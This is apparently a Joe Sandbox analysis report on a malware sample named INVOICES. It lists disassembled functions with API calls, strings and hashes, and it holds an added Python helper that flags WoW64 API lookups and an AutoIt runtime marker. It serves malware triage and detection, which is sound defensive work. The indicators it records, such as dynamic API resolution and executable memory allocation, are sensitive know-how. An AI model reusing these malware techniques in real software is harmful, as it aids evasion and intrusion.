• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00742EC6
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                  • API String ID: 1943609520-557222456
                                                                                                                                  • Opcode ID: 5e778facd6c95a8f002eef63fd6609670b13e0daa68159ad5069099be0b4c4e9
                                                                                                                                  • Instruction ID: 9aa3fef56f946d100711957743ee5654d023ca092c5e34da12c9858084fb8370
                                                                                                                                  • Opcode Fuzzy Hash: 5e778facd6c95a8f002eef63fd6609670b13e0daa68159ad5069099be0b4c4e9
                                                                                                                                  • Instruction Fuzzy Hash: 6C917271108605DFDB28EF24C899C6EB7B5EF85740F04491DF849972A2DB78EE44CB92
APIs
  • Part of subcall function 007348AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007348A1,?,?,007337C0,?), ref: 007348CE
• CoInitialize.OLE32(00000000), ref: 0079BA47
• CoCreateInstance.COMBASE(007C2D6C,00000000,00000001,007C2BDC,?), ref: 0079BA60
• CoUninitialize.COMBASE ref: 0079BA7D
  • Part of subcall function 00739997: __itow.LIBCMT ref: 007399C2
  • Part of subcall function 00739997: __swprintf.LIBCMT ref: 00739A0C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
• String ID: .lnk
• API String ID: 2126378814-24824748
• Opcode ID: 2df9235f5110931ac70fe97c839036d53af97c2641a18f5024b3fd64063213c9
• Instruction ID: 7dd8b67aaadabd2e81e9766c3a2b9e833eedbe5f048d7f7d9e2f9f0d792b05f4
• Opcode Fuzzy Hash: 2df9235f5110931ac70fe97c839036d53af97c2641a18f5024b3fd64063213c9
• Instruction Fuzzy Hash: F5A168756043059FCB10DF14D988E5ABBE5FF89314F048988F8999B3A2CB35EC45CB91
APIs
• OleSetContainedObject.OLE32(?,00000001), ref: 0078B780
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: ContainedObject
• String ID: AutoIt3GUI$Container$%|
• API String ID: 3565006973-2882729281
• Opcode ID: 6dd75b5227978b15e30f93c686da8ba3fe37c74df2505c3d608d57ff4233bcd3
• Instruction ID: d6d00767464ae4a31ac429f69b300ed234c45cd49de55277064b75ad77eedf14
• Opcode Fuzzy Hash: 6dd75b5227978b15e30f93c686da8ba3fe37c74df2505c3d608d57ff4233bcd3
• Instruction Fuzzy Hash: 2C912A70640601DFDB24EF64C894B66BBF8FF48710F14856DE949CB691EBB5E841CB90
APIs
• __startOneArgErrorHandling.LIBCMT ref: 0075521D
  • Part of subcall function 00760270: __87except.LIBCMT ref: 007602AB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: ErrorHandling__87except__start
• String ID: pow
• API String ID: 2905807303-2276729525
• Opcode ID: 9ed0783491f517bf49eac80baf9f7779fcb506daa39c849a5e3ba8445811d91a
• Instruction ID: e58765e6c8f3f827e130cfbf33f81e41d9e23b096d928fe3fd477f6cea61fced
• Opcode Fuzzy Hash: 9ed0783491f517bf49eac80baf9f7779fcb506daa39c849a5e3ba8445811d91a
• Instruction Fuzzy Hash: 95515B60A0CA01D7DB216714C9653AF2B94BB00752F24895CEC96462A5EFAC8CCC9B86
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID:
• String ID: #$+
• API String ID: 0-2552117581
• Opcode ID: 9b9af75d34c1a9c246e8ca6e694936c9797cad7c3d9f51ab47d0c683d6a4b727
• Instruction ID: fc15299cc1614d20cfdc5b7c6b10b6ceffafa8557cf3f3acc9be9fb343c9b1ba
• Opcode Fuzzy Hash: 9b9af75d34c1a9c246e8ca6e694936c9797cad7c3d9f51ab47d0c683d6a4b727
• Instruction Fuzzy Hash: A9511EB554424ADFDF25AF28C489AFABBB0FF25310F144059EC919B2A1C77C9C46CBA0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: _memmove$_free
• String ID: Oat
• API String ID: 2620147621-2936667180
• Opcode ID: c2d2703404fa24ff17e76d4c023d62d408b6f144af604a70b3da254e97472268
• Instruction ID: b27c9035ea2772c575990698a084f652ff5a2557672593bfa4a20238d21eba90
• Opcode Fuzzy Hash: c2d2703404fa24ff17e76d4c023d62d408b6f144af604a70b3da254e97472268
• Instruction Fuzzy Hash: 31516B716083419FDB28CF28C881B6ABBE5BF85314F45892DE989C7351E739E915CB82
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: _memset$_memmove
• String ID: ERCP
• API String ID: 2532777613-1384759551
• Opcode ID: 47d4a23986eb7a6b55a488066d87265fcdefa9db10dd6ad0ec03a7ad7a5f4541
• Instruction ID: 25051b6671c1f319a8784a3e2124aabd10b93d6f9a43731d4c7a5cdfd78bef4a
• Opcode Fuzzy Hash: 47d4a23986eb7a6b55a488066d87265fcdefa9db10dd6ad0ec03a7ad7a5f4541
• Instruction Fuzzy Hash: 6A51D271900349DBDB24DF69C8457EAB7F4EF05314F20856EE94ACB241E378EA85CB81
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007BF910,00000000,?,?,?,?), ref: 007B7A11
• GetWindowLongW.USER32 ref: 007B7A2E
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 007B7A3E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
• Opcode ID: 5a7626960706ea8d9b7931dd2268e474d56154eb0e35b80b3b9d4246b0a92fb2
• Instruction ID: e7774859a347b26b1e1b6449d722e4cbf6a446e2b2ae478052eeb41a2b1c061c
• Opcode Fuzzy Hash: 5a7626960706ea8d9b7931dd2268e474d56154eb0e35b80b3b9d4246b0a92fb2
• Instruction Fuzzy Hash: 2631BE71204609ABDB158E38CC45BEA7BA9EB89324F208725F975A21E1D738ED51CB50
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007B7493
                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007B74A7
                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 007B74CB
                                                                                                                                  Strings
Memory Dump Source / Joe Sandbox IDA Plugin: same as the entry above (00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true; snapshot hcaresult_0_2_730000_INVOICES.jbxd)
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window
                                                                                                                                  • String ID: SysMonthCal32
                                                                                                                                  • API String ID: 2326795674-1439706946
                                                                                                                                  • Opcode ID: 3e907d8027275ba1fcbb6bac96927562b6d5a3c961bf28e63937b78884fe8c72
                                                                                                                                  • Instruction ID: d7c65db66a47182839ae991d9d4eb00998a764097d34414ec9bea84ee5b71460
                                                                                                                                  • Opcode Fuzzy Hash: 3e907d8027275ba1fcbb6bac96927562b6d5a3c961bf28e63937b78884fe8c72
                                                                                                                                  • Instruction Fuzzy Hash: AB21E232600218BBDF258F94DC46FEA3B79EF88724F110214FE146B1D0D6B9AC50CBA0
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007B6D6D
                                                                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007B6D7D
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007B6DA2
                                                                                                                                  Strings
Memory Dump Source / Joe Sandbox IDA Plugin: same as the entry above (00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true; snapshot hcaresult_0_2_730000_INVOICES.jbxd)
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$MoveWindow
                                                                                                                                  • String ID: Listbox
                                                                                                                                  • API String ID: 3315199576-2633736733
                                                                                                                                  • Opcode ID: 3ba6f132e3eeec6fe30f40ac166be58eb2944a176e18c7c92cc6b50672747104
                                                                                                                                  • Instruction ID: 0eaa2dfc3fa8248d2a687df30faee80bc27dfb808a18a2d1f722ca3b71c49adf
                                                                                                                                  • Opcode Fuzzy Hash: 3ba6f132e3eeec6fe30f40ac166be58eb2944a176e18c7c92cc6b50672747104
                                                                                                                                  • Instruction Fuzzy Hash: B921A472710118BFEF118F54DC85FFB3BAAEF89754F118124FA049B190C679AC5187A0
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007B77A4
                                                                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007B77B9
                                                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007B77C6
                                                                                                                                  Strings
Memory Dump Source / Joe Sandbox IDA Plugin: same as the entry above (00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true; snapshot hcaresult_0_2_730000_INVOICES.jbxd)
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: msctls_trackbar32
                                                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                                                  • Opcode ID: fe3d805f5f6d6e59aa3e662580c358d74fab743405e27b4c6e8bcbf7b085fa26
                                                                                                                                  • Instruction ID: f8d24aba0dcad8a55fba495bcff423f84b6930faf667889e8373e8616fc9a24a
                                                                                                                                  • Opcode Fuzzy Hash: fe3d805f5f6d6e59aa3e662580c358d74fab743405e27b4c6e8bcbf7b085fa26
                                                                                                                                  • Instruction Fuzzy Hash: 2311E372254208BAEF149F74CC45FEB7BA9EFC9B24F014618FA41A60E0D676E811CB20
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00771CB7,?), ref: 007AC112
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007AC124
                                                                                                                                  Strings
Memory Dump Source / Joe Sandbox IDA Plugin: same as the entry above (00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true; snapshot hcaresult_0_2_730000_INVOICES.jbxd)
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-1816364905
                                                                                                                                  • Opcode ID: 5209b6ab970c41b424f6ceb635f89e75c5a81c1fc700f5f6b5b9784bd86925c6
                                                                                                                                  • Instruction ID: 4559e915f622acf1fc22ae8e622d945899a39bb5adb6d170081715b680f60d24
                                                                                                                                  • Opcode Fuzzy Hash: 5209b6ab970c41b424f6ceb635f89e75c5a81c1fc700f5f6b5b9784bd86925c6
                                                                                                                                  • Instruction Fuzzy Hash: 2FE08CF820072BDFC7215B29CC08B4276E8EF0AB44B40C939E886D2250E77CC880CB10
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00734C2E), ref: 00734CA3
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00734CB5
                                                                                                                                  Strings
Memory Dump Source / Joe Sandbox IDA Plugin: same as the entry above (00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true; snapshot hcaresult_0_2_730000_INVOICES.jbxd)
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-192647395
                                                                                                                                  • Opcode ID: b0d2f0b2831a4593b4d1d8faa5dc6b2b14552a57bc3a5abc0bb166ac7a829cd7
                                                                                                                                  • Instruction ID: b81c4961175b3b3807c218cb022400452ca8e1db65260a725cc5100aefba6503
                                                                                                                                  • Opcode Fuzzy Hash: b0d2f0b2831a4593b4d1d8faa5dc6b2b14552a57bc3a5abc0bb166ac7a829cd7
                                                                                                                                  • Instruction Fuzzy Hash: 50D012B051172BCFD7245F39DD18B4676D5AF05B51F11CC39D895D6150D678D480C660
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00734D2E,?,00734F4F,?,007F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00734D6F
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00734D81
                                                                                                                                  Strings
Memory Dump Source / Joe Sandbox IDA Plugin: same as the entry above (00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true; snapshot hcaresult_0_2_730000_INVOICES.jbxd)
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-3689287502
                                                                                                                                  • Opcode ID: 8b1c5a162f04bad659abac749e6196ea160d173ecb098f304f27e0a1d0045e1d
                                                                                                                                  • Instruction ID: a91ed21d0375bd9e3bbab063fe6a6f2ae2b0b0e6857edb17d0554af550fa2b88
                                                                                                                                  • Opcode Fuzzy Hash: 8b1c5a162f04bad659abac749e6196ea160d173ecb098f304f27e0a1d0045e1d
                                                                                                                                  • Instruction Fuzzy Hash: C9D0C270620717CFD7204F35CC0870672E9EF04741F00CD39D482C2250E678D480CA10
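The LoadLibraryA("kernel32.dll") / GetProcAddress pairs in this part of the listing (GetSystemWow64DirectoryW, GetNativeSystemInfo, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection) are the behaviour behind the report's "Contains functionality to dynamically determine API calls" signature. They are the WoW64-era kernel32 exports that a runtime must look up lazily if it still wants to load on Windows versions that lack them, and together with the ">>>AUTOIT NO CMDEXECUTE<<<" string on the stack they are consistent with the AutoIt3 runtime the report already flags ("Binary is likely a compiled AutoIt script file") rather than with the FormBook payload. The Python below is an added triage helper written for this page, not Joe Sandbox's or AutoIt's own code: it parses "APIs" lines in the format shown here (the regex is an assumption built from the visible lines), pairs each GetProcAddress with the most recent LoadLibrary*, and reports which of those four names the sample resolves at run time. The input is a constructed copy of the listing lines from this report.

```python
"""Added triage helper for Joe Sandbox 'APIs' listings.

Recovers the Win32 APIs a sample resolves at run time through a
LoadLibrary*/GetProcAddress pair and flags the WoW64 probes seen on this page.
Example code written for this report page, not Joe Sandbox's or AutoIt's own.
"""
import re
from dataclasses import dataclass

# Constructed input: the listing lines from this report, copied verbatim.
SAMPLE_LISTING = """\
• LoadLibraryA.KERNEL32(kernel32.dll,?,00771CB7,?), ref: 007AC112
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007AC124
• LoadLibraryA.KERNEL32(kernel32.dll,?,00734C2E), ref: 00734CA3
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00734CB5
• LoadLibraryA.KERNEL32(kernel32.dll,?,00734D2E,?,00734F4F,?,007F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00734D6F
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00734D81
• LoadLibraryA.KERNEL32(kernel32.dll,?,00734CE1,?), ref: 00734DA2
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00734DB4
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007B77B9
"""

# Assumed line shape (from the lines visible on the page):
#   "<bullet> Func.MODULE(arg,arg,...), ref: <hex call-site address>"
API_LINE = re.compile(
    r"^\W*(?P<func>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Assumed watch-list (editor's choice): the kernel32 exports this listing shows
# being resolved lazily. They only exist on WoW64-capable Windows, which is why
# a runtime that must still load on older systems looks them up by name
# instead of importing them statically.
WOW64_PROBES = frozenset({
    "GetSystemWow64DirectoryW", "GetNativeSystemInfo",
    "Wow64DisableWow64FsRedirection", "Wow64RevertWow64FsRedirection",
})
# Runtime string the report shows on the stack next to one of the calls.
AUTOIT_MARKER = ">>>AUTOIT NO CMDEXECUTE<<<"


@dataclass(frozen=True)
class ResolvedApi:
    library: str   # name passed to LoadLibrary*
    proc: str      # name passed to GetProcAddress
    ref: int       # address of the GetProcAddress call site in the dump


def parse_listing(text):
    """Yield (func, module, args, ref) for every API line; skip everything else."""
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",")]
            yield m.group("func"), m.group("module"), args, int(m.group("ref"), 16)


def resolved_apis(text):
    """Pair each GetProcAddress with the most recent LoadLibrary* call.

    The sandbox prints the module handle as 00000000 because it is only known
    at run time, so the library name has to come from the preceding call.
    """
    current_lib = None
    out = []
    for func, _module, args, ref in parse_listing(text):
        if func.startswith("LoadLibrary") and args[0]:
            current_lib = args[0].lower()
        elif func == "GetProcAddress" and len(args) >= 2 and current_lib:
            out.append(ResolvedApi(current_lib, args[1], ref))
    return out


def triage(text):
    """Summarise dynamic API resolution in a listing as a plain dict."""
    apis = resolved_apis(text)
    wow64 = sorted(a.proc for a in apis if a.proc in WOW64_PROBES)
    # Disable+Revert together is the idiom for touching the real System32
    # from a 32-bit process; on its own it is runtime housekeeping, not malice.
    toggle = {"Wow64DisableWow64FsRedirection",
              "Wow64RevertWow64FsRedirection"} <= set(wow64)
    marker = any(AUTOIT_MARKER in args for _f, _m, args, _r in parse_listing(text))
    return {
        "resolved": [(a.library, a.proc, f"{a.ref:08X}") for a in apis],
        "wow64_probes": wow64,
        "fs_redirection_toggle": toggle,
        "autoit_runtime_marker": marker,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LISTING).items():
        print(f"{key}: {value}")
```

Run it against the listing text of any function entry on this page; the "resolved" tuples carry the GetProcAddress call-site address so each hit can be taken straight back to the "ref:" in the report. A positive result here says only that the image resolves WoW64 helpers by name at run time; attributing it to the AutoIt runtime rather than to the injected payload still requires checking which memory region (here the 00730000 image) the entry came from.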
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00734CE1,?), ref: 00734DA2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00734DB4
                                                                                                                                  Strings
Memory Dump Source / Joe Sandbox IDA Plugin: same as the entry above (00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true; snapshot hcaresult_0_2_730000_INVOICES.jbxd)
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-1355242751
                                                                                                                                  • Opcode ID: 60eb9fa85155b888f5077cef934ff36bc8fd8c915fd1f1146ac7876ca193b6fa
                                                                                                                                  • Instruction ID: a11c46f4c1e7d0902f0b5939012ce4a7c5d7966d80f2c06f3c838239bc19ef5b
                                                                                                                                  • Opcode Fuzzy Hash: 60eb9fa85155b888f5077cef934ff36bc8fd8c915fd1f1146ac7876ca193b6fa
                                                                                                                                  • Instruction Fuzzy Hash: 9CD01270660717DFD7245F35DC08B4676D5AF05755F11CC39D8D6D6150E778D880C650
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,007B10C1), ref: 007B0E80
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007B0E92
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
• Opcode ID: 32cff744dbe990542bac6ed451492974332bd5275017f885090e71580794ab95
• Instruction ID: ed29fec55b2971155e8b3a20d3dff206087606bc3006115f9b7170ed74358838
• Opcode Fuzzy Hash: 32cff744dbe990542bac6ed451492974332bd5275017f885090e71580794ab95
• Instruction Fuzzy Hash: A5D01271511717CFD7205F39CD087C776D4AF04751B11CC39E595D2190E678C480C650
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000001,007A8E09,?,007BF910), ref: 007A9203
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007A9215
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 2574300362-199464113
• Opcode ID: 8c66a7132c40ce231d800714d30023377151b862745deffc84a5a25b713ccf2f
• Instruction ID: 294de7041c72f172b6be7b2ba7064f576787074858c94a126f827bd4335b2edc
• Opcode Fuzzy Hash: 8c66a7132c40ce231d800714d30023377151b862745deffc84a5a25b713ccf2f
• Instruction Fuzzy Hash: 82D0C27055071BDFD7204F35CC0870272D6AF05741B10CD39D885D2190D678C490C610
APIs
Strings
Similarity
• API ID: LocalTime__swprintf
• String ID: %.3d$WIN_XPe
• API String ID: 2070861257-2409531811
• Opcode ID: 5cb49544f7f14afb3993df491dfd9a07b684a6867a7bbc73b0afe07ded7b908c
• Instruction ID: fdad800addad1ce944affbba6cfee56e98d62c26ce46f1d34c0d9576fd211533
• Opcode Fuzzy Hash: 5cb49544f7f14afb3993df491dfd9a07b684a6867a7bbc73b0afe07ded7b908c
• Instruction Fuzzy Hash: 03D01271805219EACF559A958C85DFD737CA708340F95C192F90AA1040E27D9B98DB21
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 559fad1b89b0a43a53c04d3a04492efc812125a0e8f61ce518153a9a97f2adf4
• Instruction ID: f765e8ad1164720f40112e6686cfbe3303496a78369fa5e211d1c83a6372c0a6
• Opcode Fuzzy Hash: 559fad1b89b0a43a53c04d3a04492efc812125a0e8f61ce518153a9a97f2adf4
• Instruction Fuzzy Hash: 98C19375A04216EFDB18DF98C884EAEB7F5FF48714B208598E806EB251D734ED81DB90
APIs
• CharLowerBuffW.USER32(?,?), ref: 007AE1D2
• CharLowerBuffW.USER32(?,?), ref: 007AE215
  • Part of subcall function 007AD8B9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007AD8D9
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007AE415
• _memmove.LIBCMT ref: 007AE428
Similarity
• API ID: BuffCharLower$AllocVirtual_memmove
• String ID:
• API String ID: 3659485706-0
• Opcode ID: 108186e3c219b2d4537a8a6606a215c865c7ce373f27debb8c19139eead7ae65
• Instruction ID: 85e68bbd53d5bc0edb0d5b7930b0b41546aee65d8050ba4f28fef37d43ee75c4
• Opcode Fuzzy Hash: 108186e3c219b2d4537a8a6606a215c865c7ce373f27debb8c19139eead7ae65
• Instruction Fuzzy Hash: 1CC15871608301DFC714DF28C484A6ABBE4FF89714F148A6DF8999B352D778E946CB82
APIs
• CoInitialize.OLE32(00000000), ref: 007A81D8
• CoUninitialize.COMBASE ref: 007A81E3
  • Part of subcall function 0078D87B: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 0078D8E3
• VariantInit.OLEAUT32(?), ref: 007A81EE
• VariantClear.OLEAUT32(?), ref: 007A84BF
Similarity
• API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
• String ID:
• API String ID: 780911581-0
• Opcode ID: 7b589626c2e790d480bd39623e0335da94ed1575677c19419bc874315145c5b8
• Instruction ID: 72c664454190513a00f9691e7096c5331a336fe76f5fad0d668f2a11d3040c98
